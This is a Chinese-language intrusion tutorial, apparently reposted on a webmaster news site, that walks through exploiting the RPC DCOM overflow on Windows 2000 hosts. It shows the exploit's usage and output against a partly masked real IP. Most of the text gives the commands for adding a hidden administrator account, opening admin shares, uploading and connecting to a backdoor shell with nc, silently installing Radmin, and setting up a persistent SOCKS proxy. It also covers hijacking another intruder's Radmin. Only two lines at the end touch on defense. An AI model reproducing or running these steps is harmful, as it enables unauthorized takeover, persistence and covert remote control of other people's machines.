請登錄后使用快捷導航
沒有帳號？立即注冊

dcomrpc入侵

2022-9-26 10:54| 查看: 2230 |來源: 互聯網

需要的工具：很好的：?radmin.exe 掃描工具: retinarpcdcom.exe 溢出攻擊工具:RpcDcom（通用溢出工具) 腳本開啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe 代理：sksockser

需要的工具：
很好的：?radmin.exe
掃描工具: retinarpcdcom.exe
溢出攻擊工具:RpcDcom（通用溢出工具)
腳本開啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后門程序：WinEggDropShellPro3thVersion 好了，該做的都做的差不多了。現在開始把~~ 首先使用retinarpcdcom.exe掃描一個網段。查找有rpc漏洞的機子，這個漏洞需要135端口開放，（想必隨便掃一下就會發現有許多主機開放的135端口）。。。。。。 (人走運座著都能檢到錢) 211.217.50.xx?第一個主機就被掃出來又此漏洞。開始工作看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下, 好了..看樣子沒有
其他的缺陷,主機開了3389端口,我們可以上去看一下是xp版本還是win2k 哈哈，是win2k server版本
展開命令行： [查看dcomrpc的用法?用法 dcomrpc -d [options]? ] F:\hack>cd rpc\dcomrpc RPC DCOM Expl01t coded by .:[oc192.us]:. Security Complied and Modified by Expl01t www.longker.com Usage: dcomrpc -d [options]
Options:
? -d:????Hostname to attack [Required]
? -t:????Type [Default: 0]
? -r:????Return address [Default: Selected from target]
? -p:????Attack port [Default: 135]
? -l:????Bindshell port [Default: 666] Types:
? 0 [0x0018759f]: [Win2k-Universal]
? 1 [0x0100139d]: [WinXP-Universal]
開始進行溢出：
F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0 RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait...... 等到出現，說明溢出成功
c:\winnt\system32> 接著我們建立用戶 c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。把用戶添加成超級管理員
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享開了沒有,沒有的話把共享開開 c:\winnt\system32>net share
清單是空的。 c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。到這里我們入侵告一段落
[ 建立 IPC$Content$nbsp;連接，也可以使用tftp上傳，先和對方建立連接] F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上傳一個后門程序到對方的主機里] F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后運行后門程序，我們可以使用at命令。但是有的機器把at明令禁止了，建議直接開起telnet
使用opentelnet.exe? 關閉開啟的telnet使用resumetelnet \\ip user password
如果忘記開共享可以使用腳本開啟telnet來開共享，用法:
cscript telnet.vbe ip user password null port? (null是驗證方式) F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567 F:\hack>telnet 211.217.50.xx 4567
省略... 連接并運行后門程序,運行后門程序命令?根目錄：inject.exe -run
（后門使用方法和安裝都在zip文件里面包含了）后門端口123456
F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody]# 下面安裝radmin 配置好的radmin客戶端有4個文件。配置radmin客戶端可參考相關文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe 把這個4個文件copy c:\winnt\system32 在目錄下面執行命令
c:\winnt\system32>r_server /s radmin.reg? -----導入注冊表 c:\winnt\system32>r_server /install /silence -----安裝radmin.并且不顯示托盤 c:\winnt\system32>net start r_server?----- 啟動服務
可以開啟3389的話你自己看著辦把，哈哈
安裝sock代理
把sksockserver.exe copy c:\winnt\system32 c:\winnt\system32>sksockserver /install?????????-----安裝服務 c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改 c:\winnt\system32>sksockserver -config starttype 2????----開機自動啟動 c:\winnt\system32>net start skserver??????????? ----啟動服務最后刪除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安裝radmin的時候你發現有人已經安裝了。。怎么辦？走人？--------NO
看操作? (我輸入的內容) 后門連接 F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody]#（pslist） [Melody]#(pskill r_server) [Melody]#(shell) c:\winnt\system32>(del r_server.exe) c:\winnt\system32>(del admdll.dll) c:\winnt\system32>(del raddrv.dll)
copy你自己的上去，然后安裝省事的辦法直接導入注冊表，然后重新輸入安裝命令運行，就可以了，只是在原來默認端口上面架上了密碼
等等。。。。為什么我輸入導入注冊表命令不管用呢？出現什么regedit不是可運行的程序之類的。完了，努力白費了。。。。。。。 -----------------------------NO 出現這樣的情況最簡單的解決辦法telnet上去導入試試看，什么？不是把，有沒有搞錯阿。。。呵呵，盡管放心，去試試看就知道；還可以先運行radmin 然后在radmin的dos下導入，也是可以的嗬嗬，去試試看吧
防御辦法：
安裝rpc補丁
使用防火墻過濾135，445，139等端口

本文最后更新于 2022-9-26 10:54，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：[email protected]

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：網頁“黑手”如何入侵你的Windows系統 上一篇：服務器系統有防火墻的網站入侵過程

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

dcomrpc入侵

大家都在看

相關分類

熱門排行

最近更新